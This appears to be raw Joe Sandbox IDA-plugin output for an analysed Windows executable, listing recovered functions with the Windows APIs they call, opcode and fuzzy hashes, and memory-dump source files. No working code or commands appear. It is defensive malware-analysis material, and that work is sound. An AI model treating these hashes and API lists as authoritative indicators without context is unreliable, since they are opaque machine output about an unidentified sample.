                                                                      • Instruction ID: d48523be28600f1db990cb2db43d04cf5d3ed1e91e16fa2ba2b6cdae84e34d9c
                                                                      • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                      • Instruction Fuzzy Hash: F631B822E1C78245FB60BF15A41676A6350FB84B80F585231DE4DE7B96EF3CD4019B40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                      • Instruction ID: 3af44256e828a81fa30c211ff0e315b1287125239a53be530fc636349dd49355
                                                                      • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                      • Instruction Fuzzy Hash: 62317E32A0D7C1CAE760AF25E446B6A33A0FB85780F504139DA5997B8AEF3CD844DF00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction ID: ab891557e9f8151ce224631bee92363b8bd7ea85e6ea325279b59c26764bd700
                                                                      • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                      • Instruction Fuzzy Hash: B2F04F21A1DA4281EF84BB51F49627963A0EF88790F881039E95FD6666EF3CD488DB00
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction ID: 6b74d818f01e9010544a4d7e39e07e4dbf5394f2ee56bd92d433393450fbe142
                                                                      • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                      • Instruction Fuzzy Hash: E0A1D163A0E78246FB20BA6094123B96691AF007A4F585635DE6DE67C7FF7CE444A380
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 2227131780-0
                                                                      • Opcode ID: 2687bdde0b8c036ecf5149386cf56eefd3a397ebd3684ed4d5c765f9e124f73b
                                                                      • Instruction ID: 458de81590beb8b81b6c3f6727c471de980b4a92786e910b6f9b27426a1bcc7a
                                                                      • Opcode Fuzzy Hash: 2687bdde0b8c036ecf5149386cf56eefd3a397ebd3684ed4d5c765f9e124f73b
                                                                      • Instruction Fuzzy Hash: AAA1C122A0CA8282EB50FB26D5522FD6790FF85B94F504531DE5EDBB97EE3CE501A700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                      • Instruction ID: 040e943ea4e9ceadee5256c00962de64da3e23912e8c368323166091e34a534f
                                                                      • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                      • Instruction Fuzzy Hash: 4C819B22B0869286EB04FF22D4566AC27A4BB48FD4F058035DE1EEBB97EF38D401D740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                      • Instruction ID: 334217190d4aeda6d0aea32925de3024c3e38485b1c4022a6ed1b841d188ef41
                                                                      • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                      • Instruction Fuzzy Hash: 8981AF23E2C61385F760BF2594826FD26A1BB44B86F404135DD0EE76D6EF3DA48AE710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3451389628-0
                                                                      • Opcode ID: 89aa832704e6ec4e649f843465dc4667122b6c3ad4f4f569cdb76aac4797b556
                                                                      • Instruction ID: 9ef285cc24e5cff36f0ce24b3c32c83541dea51b5926393ec3338d72fabad5de
                                                                      • Opcode Fuzzy Hash: 89aa832704e6ec4e649f843465dc4667122b6c3ad4f4f569cdb76aac4797b556
                                                                      • Instruction Fuzzy Hash: A4711862B1CA429AEB10FFA5D1923FC2760EB85B88F418531DA0DE7A97EF38D105D744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 3659116390-0
                                                                      • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                      • Instruction ID: 56b8304f95b4c83fae3c2d163cd2110f81e8cbf91fa021c630c2dbacace5adfe
                                                                      • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                      • Instruction Fuzzy Hash: 3E51B133E18A5285E710EB25E4853AC77B0FB44B98F048135DE4AE7A9AEF38D185D700
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD176
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD217
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD236
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD281
                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6439BC2BF), ref: 00007FF6439BD2A0
                                                                        • Part of subcall function 00007FF643944120: WideCharToMultiByte.KERNEL32 ref: 00007FF643944160
                                                                        • Part of subcall function 00007FF643944120: WideCharToMultiByte.KERNEL32 ref: 00007FF64394419C
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                      • Instruction ID: 91ef993f425af69a280606b94a6d6411a25f1b04a19f4813f03c1dada05c78aa
                                                                      • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                      • Instruction Fuzzy Hash: 70514736A08F4685EB04FF56D9821AC73A4FB98B94B5A4432DE4EE7396EF38D441D300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                      • Instruction ID: 40cbba250ccbec4964dcae841699390b9c40372222c0e89977e8d4f16ddc2f4b
                                                                      • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                      • Instruction Fuzzy Hash: 31516533628A89D2EB50EF16D4857AD33B4FB84B84F428122CB4D83764EF39E458C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                      • Instruction ID: a2da2c5ef856f7e2ce3436a36c0a5fdf48bc917dc86a64a70d78330a7289dbe4
                                                                      • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                      • Instruction Fuzzy Hash: 9751E43260D78285E768BF2194421397794EF41BA0F246335DEADE76D6EE3CD441E740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      • Opcode ID: e4b18a81e438ec06308beac1eec7ff5c499c44309205d2103c2697249781d9b3
                                                                      • Instruction ID: 3d2caeff26d15e7b4a75b80039a79830b4fae39a33433a9d94a8199adfdaf843
                                                                      • Opcode Fuzzy Hash: e4b18a81e438ec06308beac1eec7ff5c499c44309205d2103c2697249781d9b3
                                                                      • Instruction Fuzzy Hash: 9D511B26A1CA4682DB14FF26D4921A97760FB88F94B148432EF9ED77A6DF3CD440D700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                      • Instruction ID: 4649a34f34b7e05967072cac32f91de99d360d0ad6be04035a36e63109fd91ad
                                                                      • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                      • Instruction Fuzzy Hash: F251E032B0D6828BE754FF31C6415A977A0FB45794F001231EE6AE3796DF38E4A19B00
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                      • Instruction ID: dbd30b76f0b4dfa844c9df504bfd6b4d4bf4a0bde27d34ee1db878e274306dfc
                                                                      • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                      • Instruction Fuzzy Hash: 9331073660C60587E714EF29E44A26973A1F788BA8F540231EE5ED779AEE3DEC45C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                      • Instruction ID: 282e1ae4f96ec9b75ea60d19a0a5c1d457656f482b60087b8853bf74fb92c7d9
                                                                      • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                      • Instruction Fuzzy Hash: 56414F21D4C6C2C6FBA0BB18948677D3B90AF85B48F140235D54DE65A6EF2DE885E710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                      • Instruction ID: 85443242663ccccfccdefab5781eaf02d847caa06bf2820d13f387d4108a8b50
                                                                      • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                      • Instruction Fuzzy Hash: 36319C3191CB528AE790BF02A8423397BA1FB84B90F540535D98DE7791DF7CE485EB14
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                      • Instruction ID: e8187fbf58bc811fc3e885e65c822144f9476d8d2b24bc3078ed673af43521fa
                                                                      • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                      • Instruction Fuzzy Hash: 7B218326B0CA4182E704FF27E8860ADA3A0FB89F90B044435DE5ED7766EF3CD4459740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff643920000_PPbimZI4LV.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                      • String ID:
                                                                      • API String ID: 2117695475-0
                                                                      • Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                      • Instruction ID: 1193d939125e98512eed2834a9af4fff903f21f2c4e7ea0962a8167f6f963980
                                                                      • Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
                                                                      • Instruction Fuzzy Hash: 0511CE02E1E54745FA9977F054672BC12814F7435AFA40438E93DFA2C3FD1CB8857A26
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2265133878.00007FF643921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF643920000, based on PE: true
                                                                      • Associated: 00000001.00000002.2265105606.00007FF643920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265238030.00007FF6439F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265373821.00007FF643A0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2265430727.00007FF643A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
